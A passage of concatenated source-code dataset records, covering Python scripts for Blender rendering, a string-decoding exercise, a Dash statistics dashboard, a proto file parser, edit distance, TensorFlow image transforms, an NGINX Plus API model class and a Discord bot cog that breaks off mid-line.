bpy.ops.object.select_all(action='INVERT')\n\n def printSelection(self):\n print(bpy.context.selected_objects)\n\n def clearModel(self):\n self.selectModel()\n bpy.ops.object.delete()\n\n # The meshes still present after delete\n for item in bpy.data.meshes:\n bpy.data.meshes.remove(item)\n for item in bpy.data.materials:\n bpy.data.materials.remove(item)\n\n def loadModel(self, file_path):\n self.model_loaded = True\n try:\n if file_path.endswith('obj'):\n bpy.ops.import_scene.obj(filepath=file_path)\n elif file_path.endswith('3ds'):\n bpy.ops.import_scene.autodesk_3ds(filepath=file_path)\n elif file_path.endswith('dae'):\n # Must install OpenCollada. Please read README.md\n bpy.ops.wm.collada_import(filepath=file_path)\n else:\n self.model_loaded = False\n raise Exception(\"Loading failed: %s\" % (file_path))\n except Exception:\n self.model_loaded = False\n\n def render(self, image_path=os.path.join(RENDERING_PATH, 'tmp.png')):\n '''\n Render the object\n '''\n self.result_fn = image_path\n bpy.context.scene.render.filepath = image_path\n\n bpy.ops.render.render(write_still=True) # save straight to file\\\n\n def vertex_paint(self, image_path=os.path.join(RENDERING_PATH, 'tmp.png'), classes=None):\n '''\n Render the object\n '''\n if not self.model_loaded:\n print('Model not loaded.')\n return\n print('entering NOCS rendering mode')\n i = 0\n for item in bpy.data.objects:\n if item.type == 'MESH':\n if item.name == 'plane':\n mat = self.makeMaterial('transparent', (1, 1, 1), (0, 0, 0), 0)\n else:\n item.select = True\n vcol_layer = item.data.vertex_colors.active\n\n assert len(item.data.vertex_colors)!=0\n vcol_layer = item.data.vertex_colors[-1]\n item.data.vertex_colors.active = vcol_layer\n item.data.update()\n\n mat = bpy.data.materials.new('material_color_{}'.format(i))\n i += 1\n\n mat.use_vertex_color_light = False\n mat.use_shadeless = True\n mat.use_face_texture = False\n mat.use_vertex_color_paint = True\n\n # mat.diffuse_color = [0, 0, 0]\n # mat.diffuse_shader = 'LAMBERT'\n # mat.diffuse_intensity = 1.0\n # mat.specular_color = [0, 0, 0]\n # mat.specular_shader = 'COOKTORR'\n # mat.specular_intensity = 0.5\n # mat.alpha = 1\n # mat.ambient = 1\n # mat.use_transparency = True\n # mat.transparency_method = 'Z_TRANSPARENCY'\n \n if item.data.materials:\n for i in range(len(item.data.materials)):\n item.data.materials[i] = mat\n else:\n item.data.materials.append(mat)\n item.active_material = mat\n\n \n # bpy.ops.object.mode_set(mode='VERTEX_PAINT')\n self.result_fn = image_path\n bpy.context.scene.render.filepath = image_path\n self.render_context.use_textures = False\n bpy.ops.render.render(write_still=True) # save straight to file\\\n\ndef main():\n # initialize the blender render\n renderer = BlenderRenderer(640, 480)\n renderer.clearModel()\n renderer._set_lighting()\n # \n dirname = './'\n\n # create a Cube\n create.cube('PerfectCube')\n renderer.model_loaded = True\n \n # material for masks\n materials = []\n synset_colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (1, 1, 0), (1, 0, 1), (0, 1, 1), (1, 1, 1)]\n for i in range(len(synset_colors)):\n materials.append(renderer.makeMaterial('transparent', synset_colors[i], (0, 0, 0), 1))\n\n # set camera view points \n view_num = 1\n distance = 2.0\n lookat_position = [0, 0, 0]\n viewpoints = np.zeros((view_num, 3))\n viewpoints[..., 0] = (np.random.rand(view_num) - 0.5) * 0 + 45 # azimuth\n viewpoints[..., 1] = (np.random.rand(view_num) - 0.5) * 0 + 45 # elevation\n viewpoints[..., 2] = (np.random.rand(view_num) - 0.5) * 0 # tilt\n\n # assign vertex colors by coordinates\n for item in bpy.data.objects:\n if item.type == 'MESH': \n item.select = True\n if len(item.data.vertex_colors)==0:\n print('---using material from ', item.name)\n vcol_layer = item.data.vertex_colors.new()\n for loop_index, loop in enumerate(item.data.loops):\n loop_vert_index = loop.vertex_index\n color = item.data.vertices[loop_vert_index].co\n # color = Vector([0.5, 0.5, 0.5])\n # color = (item_color.data.vertices[loop_vert_index].co - Vector(XYZ_c[:, mesh[item_color.name]].tolist())) / XYZ_l[mesh[item_color.name]] + Vector([0.5, 0.5, 0.5])\n vcol_layer.data[loop_index].color = color\n else:\n vcol_layer = item.data.vertex_colors.active\n item.select = False\n\n # assign mask colors to all the materials of all the models\n for item in bpy.data.objects:\n if item.type == 'MESH':\n mat = materials[0]\n if item.data.materials:\n for i in range(len(item.data.materials)):\n # item.data.materials[i] = mat\n item.data.materials[i].diffuse_color = mat.diffuse_color\n item.data.materials[i].diffuse_shader = mat.diffuse_shader\n item.data.materials[i].diffuse_intensity = mat.diffuse_intensity\n item.data.materials[i].specular_color = mat.specular_color\n item.data.materials[i].specular_shader = mat.specular_shader\n item.data.materials[i].specular_intensity = mat.specular_intensity\n item.data.materials[i].alpha = mat.alpha\n item.data.materials[i].ambient = mat.ambient\n item.data.materials[i].use_transparency = mat.use_transparency\n item.data.materials[i].transparency_method = mat.transparency_method\n item.data.materials[i].use_shadeless = mat.use_shadeless\n item.data.materials[i].use_face_texture = mat.use_face_texture\n else:\n item.data.materials.append(mat)\n\n # render mask\n for i in range(view_num):\n azimuth = viewpoints[i][0]\n elevation = viewpoints[i][1]\n tilt = viewpoints[i][2]\n\n # set viewpoint\n renderer.setViewpoint(azimuth, elevation, tilt, distance, 25, lookat_position=lookat_position)\n # set transparency\n renderer.setTransparency('TRANSPARENT')\n\n # rendering\n filename = dirname + '/mask/%04d.png' % i\n renderer.render_context.use_textures = False\n renderer.render(filename)\n\n # render coordinate map\n for i in range(view_num):\n azimuth = viewpoints[i][0]\n elevation = viewpoints[i][1]\n tilt = viewpoints[i][2]\n\n # set viewpoint\n renderer.setViewpoint(azimuth, elevation, tilt, distance, 25, lookat_position=lookat_position)\n\n # set transparency\n renderer.setTransparency('TRANSPARENT')\n\n # rendering\n filename = dirname + '/label/%04d.png' % i\n renderer.render_context.use_textures = False\n renderer.vertex_paint(filename)\n # renderer.clearModel()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/blender_unit_test.py","file_name":"blender_unit_test.py","file_ext":"py","file_size_in_byte":20116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"644720946","text":"'''\nThe Spy Life\n\nYou are a secret agent, and you receive an encrypted message that needs to be decoded. The code that is being used flips the message backwards and inserts non-alphabetic characters in the message to make it hard to decipher.\n\nTask: \nCreate a program that will take the encoded message, flip it around, remove any characters that are not a letter or a space, and output the hidden message.\n\nInput Format: \nA string of characters that represent the encoded message.\n\nOutput Format: \nA string of character that represent the intended secret message.\n\nSample Input: \nd89%l++5r19o7W *o=l645le9H\n\nSample Output: \nHello World\n\n'''\n\n\n\n\nimport re\nmessage=str(input())\nflipped_input=message[::-1]\n#print(flipped_input)\noutput=\"\"\nfor i in flipped_input:\n\tregex=re.compile(\"[^\\sa-zA-Z]\")\n\tclean=regex.sub(\"\", i)\n\toutput+=clean\nprint(output)\n","sub_path":"Spy_life.py","file_name":"Spy_life.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"142157480","text":"import dash_core_components as dcc\nfrom dash_core_components.Dropdown import Dropdown\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nfrom django_plotly_dash import DjangoDash\nimport pandas as pd\nimport plotly.express as px\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = DjangoDash('VisualApp', external_stylesheets=external_stylesheets)\n\n\n\ndata = pd.read_csv(\"static/final.csv\")\nfeatures = data.columns.to_list()\n\nfig = px.histogram(data, x=features[1])\n\nbar1 = px.bar(data,\n x=\"Country\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Yearly Suicide Counts by Country\",\n barmode=\"group\")\nbar2 = px.bar(data,\n x=\"Country\",\n y=[\"Pre-Intervention Suicide\",\"Post-Intervention Suicide\"],\n title=\"Total Suicide Counts by Country\",\n barmode=\"group\")\nbar3 = px.bar(data,\n x=\"Phones\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Phones\")\nbar4 = px.bar(data,\n x=\"Signs with Emergency Contact\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Signs with Emergency Contact\")\nbar5 = px.bar(data,\n x=\"CCTV\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"CCTV\")\nbar6 = px.bar(data,\n x=\"Safety Staff\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Safety Staff\")\nbar7 = px.bar(data,\n x=\"Blue Lights\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Blue Lights\")\n\npie1 = px.pie(data,\n title=\"Yearly Pre-Intervention Suicides by Location\",\n names=\"Location Type\",\n values=\"Yearly Pre-Intervention Rate\")\npie2 = px.pie(data,\n title=\"Yearly Post-Intervention Suicides by Location\",\n names=\"Location Type\",\n values=\"Yearly Post Intervention Rate\")\npie3 = px.pie(data,\n title=\"Yearly Pre-Intervention Suicides by Method\",\n names=\"Suicide Method\",\n values=\"Yearly Pre-Intervention Rate\")\npie4 = px.pie(data,\n title=\"Yearly Post-Intervention Suicides by Method\",\n names=\"Suicide Method\",\n values=\"Yearly Post Intervention Rate\")\n\n\napp.layout = html.Div(children=[\n html.Div(\n children=[\n html.Div(\n children=[ \n dcc.Graph(\n id=\"main-graph\",\n figure=fig\n ),\n ],\n className=\"nine columns\"\n ),\n html.Div(\n children=[\n html.Br(),\n html.Br(),\n html.Label(\"Select Feature\"),\n dcc.Dropdown(\n id=\"feature-select\",\n options=[\n {'label':x, 'value': x} for x in features\n ],\n value=features[1],\n clearable=False\n ),\n html.Br(),\n html.Label(\"Select Graph type\"),\n dcc.Dropdown(\n id=\"graph-select\",\n options=[\n {'label':'Histogram', 'value': 'hist'},\n {'label':'Scatterplot', 'value': 'scatter'},\n {'label':'Boxplot', 'value':'box'}\n ],\n value='hist',\n clearable=False\n ),\n ],\n className=\"three columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Hr(),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie1\",\n figure=pie1\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie2\",\n figure=pie2\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie3\",\n figure=pie3\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"pie4\",\n figure=pie4\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Hr(),\n dcc.Graph(\n id=\"bar1\",\n figure=bar1\n ),\n dcc.Graph(\n id=\"bar2\",\n figure=bar2\n ),\n html.Hr(),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar3\",\n figure=bar3\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar4\",\n figure=bar4\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar5\",\n figure=bar5\n ),\n ],\n className=\"six columns\"\n ),\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar6\",\n figure=bar6\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n dcc.Graph(\n id=\"bar7\",\n figure=bar7\n ),\n ],\n className=\"six columns\"\n ),\n ],\n className=\"row\"\n ),\n])\n\n\n@app.callback(\n Output(\"main-graph\",\"figure\"),\n [Input(\"feature-select\", \"value\"), Input(\"graph-select\",\"value\")]\n)\ndef UpdateGraph(feature, graph):\n if graph == 'hist':\n fig2 = px.histogram(data, x=feature)\n elif graph == 'scatter':\n fig2 = px.scatter(data, x=feature)\n else:\n fig2 = px.box(data, x=feature)\n fig2.update_layout(\n title=\"Graph: \"+feature\n )\n return fig2","sub_path":"interface/main/dash_apps/visuals.py","file_name":"visuals.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"369310226","text":"import sys\nimport os\nimport re\nimport string\n\ndef base_dir():\n path = sys.argv[0]\n path = os.path.dirname(os.path.abspath(path))\n (base, _) = os.path.split(path)\n return base\n\ndef proto_dir():\n baseDir = base_dir()\n return os.path.join(baseDir, \"proto\")\n\ndef script_dir():\n baseDir = base_dir()\n return os.path.join(baseDir, \"script\")\n\ndef target_dir(target):\n baseDir = base_dir()\n return os.path.join(baseDir, \"target\", target)\n\ndef is_comment(str):\n return re.match(\"^\\s*(\\/+|%+)\", str)\n\ndef is_blank_line(str):\n return len(string.strip(str)) == 0\n\ndef is_message_begin(str):\n return re.match(\"^\\s*message\", str)\n\ndef is_message_end(str):\n return re.match(\"^\\s*end\", str)\n\ndef ensure_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\n\ndef get_all_proto():\n files = []\n protoDir = proto_dir()\n for f in os.listdir(protoDir):\n # print(f)\n if re.search(\"\\.proto$\", f):\n files.append(os.path.join(protoDir, f))\n\n return files\n\nclass myerror(BaseException):\n def __init__(self, line, msg):\n self.line = line\n self.msg = msg\n\n def __str__(self):\n return \"[line: %s] %s\" % (self.line, self.msg)\n\nclass helper(object):\n def __init__(self, handler):\n self.curline = 0\n self.curfile = \"\"\n self.handler = handler\n self.initTmpdata()\n\n def initTmpdata(self):\n self.isBegin = False\n self.isEnd = False\n self.tmpDict = {\"head\":False, \"body\": []}\n\n def parse_head(self, str):\n s = string.split(str, \" \")\n return string.rstrip(s[1], \"\\n\\0\")\n\n def parse_body(self, str):\n arr = string.split(str, \";\")\n if not arr[0]:\n raise myerror(self.curline, \"message define error\")\n arr = string.split(string.strip(arr[0]))\n arrlen = len(arr)\n if arrlen >3 or arrlen < 2:\n raise myerror(self.curline, \"message define error\")\n if arrlen == 3 and arr[1] != \"*\":\n raise myerror(self.curline, \"message define error\")\n\n body = {}\n if arrlen == 3:\n body[\"type\"] = arr[0]\n body[\"isarray\"] = True\n body[\"name\"] = arr[2]\n elif arrlen == 2:\n body[\"name\"] = arr[1]\n if arr[0][-1] == \"*\":\n body[\"isarray\"] = True\n else:\n body[\"isarray\"] = False\n\n body[\"type\"] = string.rstrip(arr[0], \"*\")\n\n return body\n\n def set_line(self, line):\n self.curline = self.curline + 1\n line = string.strip(line, \" \\0\")\n if not is_comment(line) and not is_blank_line(line):\n self.isBegin = is_message_begin(line)\n self.isEnd = is_message_end(line)\n if self.isBegin:\n head = self.parse_head(line)\n if self.tmpDict[\"head\"] or not head:\n raise myerror(self.curline, \"invalid message head\")\n self.tmpDict[\"head\"] = head\n elif self.isEnd:\n if not self.tmpDict[\"head\"]:\n raise myerror(self.curline, \"message begin and end no match\")\n ## get a message\n self.handler(self.tmpDict)\n self.initTmpdata()\n else:\n ## body define\n if not self.tmpDict[\"head\"]:\n raise myerror(self.curline, \"miss message begin\")\n\n body = self.parse_body(line)\n self.tmpDict[\"body\"].append(body)\n\n\n\n\n","sub_path":"script/parse_util.py","file_name":"parse_util.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207640838","text":"\"\"\"\nProblem:\n\nThe edit distance between two strings refers to the minimum number of character insertions, deletions, and substitutions required to change one string to the other.\nGiven two strings, compute the edit distance between them.\n\nExample:\n\nInput = “kitten”, “sitting”\nOutput = 3\n\"\"\"\n\n# FUNCTION TO PERFORM THE OPERATION\ndef string_distance(str1, str2):\n # if the strings are same, the distance between the strings is 0 [BASE CASE FOR RECURSION]\n if str1 == str2:\n return 0\n # if str1 is an empty string, distance is length of str2 (len(str2) characters have to be inserted) [BASE CASE FOR RECURSION]\n elif not str1:\n return len(str2)\n # if str2 is an empty string, distance is length of str1 (len(str1) characters have to be inserted) [BASE CASE FOR RECURSION]\n elif not str2:\n return len(str1)\n\n # if the 1st character are the same for both strings\n if str1[0] == str2[0]:\n return string_distance(str1[1:], str2[1:])\n\n # if the 1st character are different, we choose the minimum distance for 1st character deletion, addition and modifying the charcter + 1 (due to the change in the character)\n return 1 + min(\n string_distance(str1[1:], str2), # deletion from str1\n string_distance(str1, str2[1:]), # addition to str1\n string_distance(str1[1:], str2[1:]),\n ) # modification to str1\n\n\n# DRIVER CODE\nprint(string_distance(\"kitten\", \"sitting\"))\n","sub_path":"Solutions/031.py","file_name":"031.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"645881988","text":"try:\n import accimage\nexcept ImportError:\n accimage = None\nimport numpy as np\nimport tensorflow as tf\n\nfrom ._utils import _is_pil_image\nfrom ._utils import _is_numpy_image\nfrom ._utils import _is_tensor_image\nfrom ._utils import _get_image_dimension\nfrom .transformer import Transformer\n\nclass ImageToTensor(Transformer):\n \"\"\"Convert a Image to tensor.\n \"\"\"\n def __call__(self, value):\n if not(_is_pil_image(value) or _is_numpy_image(value)):\n format_string = 'image should be PIL Image or ndarry. but got {}.'\n raise TypeError(format_string.format(type(value)))\n\n if isinstance(value, np.ndarray):\n if value.ndim == 2:\n value = value[:, :, None]\n\n image = tf.convert_to_tensor(value)\n return image\n\n if accimage is not None and isinstance(value, accimage.Image):\n nppic = np.zeros([value.channels, value.height, value.width],\n dtype=np.float32)\n value.copyto(nppic)\n return tf.convert_to_tensor(nppic)\n\n # handle PIL Image\n if value.mode == 'I':\n image = tf.convert_to_tensor(value, dtype=tf.int32)\n elif value.mode == 'I;16':\n image = tf.convert_to_tensor(value, dtype=tf.int16)\n elif value.mode == 'F':\n image = tf.convert_to_tensor(value, dtype=tf.float32)\n elif value.mode == '1':\n image = 255 * tf.convert_to_tensor(value, dtype=tf.uint8)\n else:\n image = tf.convert_to_tensor(value, dtype=tf.uint8)\n\n # PIL image mode: L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK\n if value.mode == 'YCbCr':\n nchannel = 3\n elif value.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(value.mode)\n\n image = tf.reshape(image, [value.size[1], value.size[0], nchannel])\n # Convert the value format from HWC to CHW.\n image = tf.transpose(image, [2, 0, 1])\n return image\n\nclass ResizeImages(Transformer):\n \"\"\"Resize an image.\n \"\"\"\n def __init__(self, size=(224, 224),\n method=tf.image.ResizeMethod.BILINEAR,\n align_corners=False):\n self._size = size\n self._method = method\n self._align_corners = align_corners\n\n def __call__(self, value):\n if isinstance(value, np.ndarray):\n if value.ndim == 3:\n value = np.expand_dims(value, 0)\n elif value.ndim != 4:\n raise ValueError('The dimension must be 3 or 4.')\n elif not isinstance(value, (tuple, list)):\n raise TypeError('The input must be list, tuple or numpy array.')\n\n value = [tf.convert_to_tensor(v) for v in value]\n\n images = []\n size = self._size\n _, _, channels = _get_image_dimension(value[0])\n\n for v in value:\n if not _is_tensor_image(v):\n raise ValueError('The value is not image.')\n\n image = tf.expand_dims(v, 0)\n image = tf.image.resize(image, size,\n self._method,\n self._align_corners)\n image = tf.reshape(image, tf.stack([size[0], size[1], channels]))\n images.append(image)\n return images\n","sub_path":"imitation/transform/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"18515339","text":"# coding: utf-8\n\n\"\"\"\n NGINX Plus REST API\n\n NGINX Plus REST [API](https://nginx.org/en/docs/http/ngx_http_api_module.html) provides access to NGINX Plus status information, on-the-fly configuration of upstream servers and key-value pairs management for [http](https://nginx.org/en/docs/http/ngx_http_keyval_module.html) and [stream](https://nginx.org/en/docs/stream/ngx_stream_keyval_module.html). # noqa: E501\n\n OpenAPI spec version: 2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom nginxplus.models.nginx_stream_server_zone_sessions import NginxStreamServerZoneSessions # noqa: F401,E501\n\n\nclass NginxStreamServerZone(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'processing': 'int',\n 'connections': 'int',\n 'sessions': 'NginxStreamServerZoneSessions',\n 'discarded': 'int',\n 'received': 'int',\n 'sent': 'int'\n }\n\n attribute_map = {\n 'processing': 'processing',\n 'connections': 'connections',\n 'sessions': 'sessions',\n 'discarded': 'discarded',\n 'received': 'received',\n 'sent': 'sent'\n }\n\n def __init__(self, processing=None, connections=None, sessions=None, discarded=None, received=None, sent=None): # noqa: E501\n \"\"\"NginxStreamServerZone - a model defined in Swagger\"\"\" # noqa: E501\n\n self._processing = None\n self._connections = None\n self._sessions = None\n self._discarded = None\n self._received = None\n self._sent = None\n self.discriminator = None\n\n if processing is not None:\n self.processing = processing\n if connections is not None:\n self.connections = connections\n if sessions is not None:\n self.sessions = sessions\n if discarded is not None:\n self.discarded = discarded\n if received is not None:\n self.received = received\n if sent is not None:\n self.sent = sent\n\n @property\n def processing(self):\n \"\"\"Gets the processing of this NginxStreamServerZone. # noqa: E501\n\n The number of client connections that are currently being processed. # noqa: E501\n\n :return: The processing of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._processing\n\n @processing.setter\n def processing(self, processing):\n \"\"\"Sets the processing of this NginxStreamServerZone.\n\n The number of client connections that are currently being processed. # noqa: E501\n\n :param processing: The processing of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._processing = processing\n\n @property\n def connections(self):\n \"\"\"Gets the connections of this NginxStreamServerZone. # noqa: E501\n\n The total number of connections accepted from clients. # noqa: E501\n\n :return: The connections of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._connections\n\n @connections.setter\n def connections(self, connections):\n \"\"\"Sets the connections of this NginxStreamServerZone.\n\n The total number of connections accepted from clients. # noqa: E501\n\n :param connections: The connections of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._connections = connections\n\n @property\n def sessions(self):\n \"\"\"Gets the sessions of this NginxStreamServerZone. # noqa: E501\n\n\n :return: The sessions of this NginxStreamServerZone. # noqa: E501\n :rtype: NginxStreamServerZoneSessions\n \"\"\"\n return self._sessions\n\n @sessions.setter\n def sessions(self, sessions):\n \"\"\"Sets the sessions of this NginxStreamServerZone.\n\n\n :param sessions: The sessions of this NginxStreamServerZone. # noqa: E501\n :type: NginxStreamServerZoneSessions\n \"\"\"\n\n self._sessions = sessions\n\n @property\n def discarded(self):\n \"\"\"Gets the discarded of this NginxStreamServerZone. # noqa: E501\n\n The total number of connections completed without creating a session. # noqa: E501\n\n :return: The discarded of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._discarded\n\n @discarded.setter\n def discarded(self, discarded):\n \"\"\"Sets the discarded of this NginxStreamServerZone.\n\n The total number of connections completed without creating a session. # noqa: E501\n\n :param discarded: The discarded of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._discarded = discarded\n\n @property\n def received(self):\n \"\"\"Gets the received of this NginxStreamServerZone. # noqa: E501\n\n The total number of bytes received from clients. # noqa: E501\n\n :return: The received of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._received\n\n @received.setter\n def received(self, received):\n \"\"\"Sets the received of this NginxStreamServerZone.\n\n The total number of bytes received from clients. # noqa: E501\n\n :param received: The received of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._received = received\n\n @property\n def sent(self):\n \"\"\"Gets the sent of this NginxStreamServerZone. # noqa: E501\n\n The total number of bytes sent to clients. # noqa: E501\n\n :return: The sent of this NginxStreamServerZone. # noqa: E501\n :rtype: int\n \"\"\"\n return self._sent\n\n @sent.setter\n def sent(self, sent):\n \"\"\"Sets the sent of this NginxStreamServerZone.\n\n The total number of bytes sent to clients. # noqa: E501\n\n :param sent: The sent of this NginxStreamServerZone. # noqa: E501\n :type: int\n \"\"\"\n\n self._sent = sent\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NginxStreamServerZone):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"nginxplus/models/nginx_stream_server_zone.py","file_name":"nginx_stream_server_zone.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"275622569","text":"from phase_IV.TFL_manager import TFL\nimport matplotlib.pyplot as plt\n\n\nclass Controller:\n\n def __init__(self):\n with open(\"data/pls_files/play_list.pls\", \"r+\") as data:\n read_lines = data.readlines()\n image_path = [line[:-1] for line in read_lines]\n self.path_images = image_path[2:]\n self.tfl_manager = TFL(image_path[0], int(image_path[1]), int(image_path[1])+len(image_path[2:])-1)\n self.first_frame = image_path[1]\n\n def run(self) -> None:\n for i in range(len(self.path_images)):\n self.tfl_manager.run_product(self.path_images[i], i)\n plt.show(block=True)\n\n\ndef main():\n controller = Controller()\n controller.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"phase_IV/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"71659729","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nfrom datetime import datetime\nimport os\nimport sqlite3\n\ndef is_admin():\n def predicate(ctx):\n conn = sqlite3.connect(os.getcwd() + '/servers/' + str(ctx.guild.id) + '/Server_Database.db')\n c = conn.cursor()\n c.execute(\"SELECT * FROM admin_table\")\n admins = c.fetchall()\n for admin in admins:\n if (ctx.author.id in admin) : return True\n return False\n return commands.check(predicate)\n\nclass Weekly_Reset(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n self.join_us_msg = '<:Crypt_Keeper:694324654227062825> Come Visit The Testing Server For Any Questions/Help : [Server_Link](https://discord.gg/weXYh8D)'\n self.colour = (0x96110F)\n\n # // -- A Function To Print Information In The Testing Servers Command Chat -- //\n async def log_command(self,ctx,func_name):\n try:\n # // -- Creating and Embed -- //\n log_embed = discord.Embed(\n title = ('Crypt Keeper Command Log'),\n description = (\"Command : {}\\nContent : `{}`\".format(func_name,ctx.message.content)),\n colour = self.colour\n )\n # // -- Giving the Embed Fields -- //\n log_embed.add_field(name = \"Guild\", value = \"{}\".format(ctx.guild), inline = False)\n log_embed.add_field(name = \"Channel\", value = \"{}\".format(ctx.channel), inline = False)\n log_embed.add_field(name = \"Author\", value = \"{}\".format(ctx.author), inline = False)\n log_embed.add_field(name = \"Time\", value = \"{}\".format(datetime.now()), inline = False)\n # // -- Sending the Embed -- //\n await self.bot.get_channel(694247048396013698).send(embed = log_embed)\n except Exception as error:\n # // -- Printing What Went Wrong to the Shell -- // \n print(\"Error Occured : [{}]\".format(error))\n return\n # // -- A Function To Print Information In The Testing Server Error Chat -- //\n async def error_log_command(self,ctx,func_name,error):\n try:\n # // -- Creating and Embed -- //\n log_embed = discord.Embed(\n title = ('Crypt Keeper Error Log'),\n description = (\"Command : {}\\nContent : `{}`\\nError : ```{}```\".format(func_name,ctx.message.content,error)),\n colour = self.colour\n )\n # // -- Giving the Embed Fields -- //\n log_embed.add_field(name = \"Guild\", value = \"{}\".format(ctx.guild), inline = False)\n log_embed.add_field(name = \"Channel\", value = \"{}\".format(ctx.channel), inline = False)\n log_embed.add_field(name = \"Author\", value = \"{}\".format(ctx.author), inline = False)\n log_embed.add_field(name = \"Time\", value = \"{}\".format(datetime.now()), inline = False)\n # // -- Sending the Embed -- //\n await self.bot.get_channel(696027589827100792).send(embed = log_embed)\n except Exception as error:\n # // -- Printing What Went Wrong to the Shell -- // \n print(\"Error Occured : [{}]\".format(error))\n return\n\n @commands.command(name = 'weekly_reset',\n aliases = ['wklyrst'])\n @is_admin()\n async def weekly_reset(self,ctx):\n await self.log_command(ctx,'weekly_reset')\n try:\n c_msg = ''\n conn = sqlite3.connect(os.getcwd() + '/servers/' + str(ctx.guild.id) + '/Server_Database.db')\n c = conn.cursor()\n c.execute(\"SELECT room_ID, room_type, reset_msg_ID, pin_reset FROM rp_room_table\")\n categories = c.fetchall()\n c.execute(\"SELECT * FROM reset_msg_table\")\n all_table_msgs = c.fetchall()\n for rp_room in categories:\n for reset_messages in all_table_msgs:\n if rp_room[2] == reset_messages[0] : c_msg = reset_messages[2]\n c_embed = discord.Embed(title = \"<:Crypt_Keeper:694324654227062825> The 